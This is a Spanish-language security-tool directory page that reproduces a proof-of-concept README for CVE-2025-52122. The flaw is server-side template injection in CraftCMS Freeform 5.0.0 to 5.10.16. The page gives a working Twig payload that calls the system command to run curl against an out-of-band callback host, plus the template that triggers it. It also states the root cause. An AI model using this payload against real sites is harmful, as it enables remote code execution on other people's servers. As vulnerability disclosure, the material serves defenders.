Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52122 — Inyección de código arbitrario en CraftCMS Freeform 5.0.0 < 5.10.16 | Kitploit
Herramientas/GitHubGitHub/timtrademark/cve-2025-52122
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

Inyección de código arbitrario en CraftCMS Freeform 5.0.0 < 5.10.16

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE CraftCMS Freeform

CraftCMS Freeform contiene una vulnerabilidad SSTI, que resulta en una inyección de código arbitrario para todos los usuarios que tienen acceso a editar un formulario (título de envío).

Las versiones vulnerables son v5.0.0 < v5.10.16.

Pasos para reproducir

Crear un formulario:

crear un formulario

Creé el formulario "pentest" aquí como prueba de concepto. A continuación, en la configuración, establece el siguiente título de envío (cambia el nombre de dominio por el de tu propio servidor):

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

título de envío

Esto ejecutará una llamada arbitraria al sistema. En este caso, realizo un curl a un servidor controlado que me notificará en caso de que haya conexiones entrantes.

A continuación, incluye este formulario en una plantilla/página y envíalo:

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

Esto habrá llamado al comando curl. Podemos verificarlo observando la solicitud HTTP entrante que se creó:

conexión entrante

La causa raíz de este problema es que Freeform implementa el filtro "call" de Twig sin validar la entrada del usuario. Esto se solucionó en el siguiente commit.

Descargar herramienta